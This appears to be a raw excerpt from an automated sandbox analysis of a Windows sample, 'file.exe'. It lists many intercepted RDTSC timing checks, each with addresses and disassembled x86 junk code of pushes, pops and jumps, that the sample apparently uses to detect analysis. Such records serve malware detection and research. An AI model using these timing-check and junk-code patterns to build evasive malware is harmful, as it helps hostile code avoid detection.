    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750859 second address: 75085E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7508F8 second address: 750902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F985 second address: 74FA0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007EFF192480C3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jg 00007EFF192480B8h 0x00000018 jmp 00007EFF192480BEh 0x0000001d popad 0x0000001e nop 0x0000001f push ecx 0x00000020 cmc 0x00000021 pop edi 0x00000022 push dword ptr fs:[00000000h] 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 call 00007EFF192480C7h 0x00000035 mov edi, dword ptr [ebp+122D2D05h] 0x0000003b pop edi 0x0000003c mov eax, dword ptr [ebp+122D1311h] 0x00000042 clc 0x00000043 mov dword ptr [ebp+1244A571h], ecx 0x00000049 push FFFFFFFFh 0x0000004b mov ebx, dword ptr [ebp+122D3D48h] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push ecx 0x00000056 pop ecx 0x00000057 pop eax 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750902 second address: 750913 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FA0D second address: 74FA12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751925 second address: 75192F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFF192B60E6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750B17 second address: 750B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750B1B second address: 750B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752BFC second address: 752C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007EFF192480B6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 752C06 second address: 752C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 757C33 second address: 757C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75AAD7 second address: 75AADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75AADB second address: 75AADF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761763 second address: 761769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761769 second address: 76176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761885 second address: 76188B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766755 second address: 76676A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C1h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76676A second address: 766770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBD13 second address: 6FBD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192480B6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765435 second address: 76543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76543B second address: 765441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765441 second address: 765447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765447 second address: 765478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007EFF192480BFh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007EFF192480BEh 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765478 second address: 765494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 jl 00007EFF192B60E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765494 second address: 76549E instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76549E second address: 7654B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C19 second address: 765C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C1F second address: 765C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C23 second address: 765C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765EB7 second address: 765EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662E1 second address: 766302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFF192480C5h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D882 second address: 76D88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFF192B60E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A447C second address: 7A4496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007EFF192480BFh 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A4496 second address: 7A449A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF95D second address: 7AF9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jc 00007EFF192480B6h 0x00000014 jl 00007EFF192480B6h 0x0000001a jmp 00007EFF192480C1h 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007EFF192480C0h 0x00000026 jmp 00007EFF192480C9h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9B5 second address: 7AF9C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007EFF192B60F2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9C2 second address: 7AF9C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFAF5 second address: 7AFB0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007EFF192B60E6h 0x0000000d jbe 00007EFF192B60E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFC89 second address: 7AFC91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFDD5 second address: 7AFDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF63 second address: 7AFF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFF192480B6h 0x0000000a pop ebx 0x0000000b jo 00007EFF192480CBh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF76 second address: 7AFF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60EFh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007EFF192B60E8h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFF94 second address: 7AFFAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFFAA second address: 7AFFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B011C second address: 7B0126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0902 second address: 7B0906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1001 second address: 7B1005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1005 second address: 7B100A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AEE50 second address: 7AEE54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B8279 second address: 7B8297 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007EFF192B60F1h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B856B second address: 7B856F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B856F second address: 7B8573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBFEF second address: 7BC002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC002 second address: 7BC092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EBh 0x00000007 jmp 00007EFF192B60F3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007EFF192B60F7h 0x00000014 pop eax 0x00000015 pushad 0x00000016 jng 00007EFF192B60E6h 0x0000001c jmp 00007EFF192B60F1h 0x00000021 popad 0x00000022 jmp 00007EFF192B60F6h 0x00000027 popad 0x00000028 pushad 0x00000029 push eax 0x0000002a push esi 0x0000002b pop esi 0x0000002c jg 00007EFF192B60E6h 0x00000032 pop eax 0x00000033 jmp 00007EFF192B60EAh 0x00000038 jmp 00007EFF192B60EDh 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6885 second address: 7C689E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFF192480C1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6431 second address: 7C6464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007EFF192B60F3h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6464 second address: 7C6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6468 second address: 7C646C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3F3 second address: 7CD3F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3F8 second address: 7CD3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD3FE second address: 7CD404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D1EA6 second address: 7D1EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFF192B60E6h 0x0000000a push edi 0x0000000b jmp 00007EFF192B60F6h 0x00000010 pop edi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9150 second address: 7D917E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFF192480C0h 0x0000000a pop edx 0x0000000b jnp 00007EFF192480E2h 0x00000011 pushad 0x00000012 jmp 00007EFF192480BFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBD03 second address: 7DBD11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jng 00007EFF192B60E8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB4D second address: 7DBB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB55 second address: 7DBB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB59 second address: 7DBB5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB5D second address: 7DBB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB6B second address: 7DBB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB6F second address: 7DBB73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB73 second address: 7DBB80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB80 second address: 7DBB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 jmp 00007EFF192B60F6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBB9F second address: 7DBBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBBA7 second address: 7DBBAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DBBAB second address: 7DBBBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFA2F second address: 7DFA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 je 00007EFF192B60F4h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DFA3E second address: 7DFA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E46 second address: 7E4E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E51 second address: 7E4E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4E59 second address: 7E4E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4FDA second address: 7E4FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52A6 second address: 7E52AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52AA second address: 7E52BA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF192480B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E52BA second address: 7E52BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E58BE second address: 7E58DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192480BEh 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007EFF192480B6h 0x00000010 jno 00007EFF192480C2h 0x00000016 je 00007EFF192480B6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E62DF second address: 7E631C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a jo 00007EFF192B611Ch 0x00000010 pushad 0x00000011 jmp 00007EFF192B60F1h 0x00000016 jmp 00007EFF192B60EEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB011 second address: 7EB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EACC0 second address: 7EACCA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFF192B60E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8759 second address: 7F875F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FAB0A second address: 7FAB15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007EFF192B60E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB17 second address: 7FEB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BAh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB26 second address: 7FEB7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007EFF192B60F5h 0x00000012 jmp 00007EFF192B60EFh 0x00000017 jmp 00007EFF192B60EFh 0x0000001c popad 0x0000001d pushad 0x0000001e jns 00007EFF192B60E6h 0x00000024 jc 00007EFF192B60E6h 0x0000002a jno 00007EFF192B60E6h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEB7C second address: 7FEB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 821BC0 second address: 821BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 829408 second address: 82940D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282B0 second address: 8282CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282CF second address: 8282E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C1h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282E4 second address: 8282FA instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFF192B60E6h 0x00000008 js 00007EFF192B60E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282FA second address: 8282FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
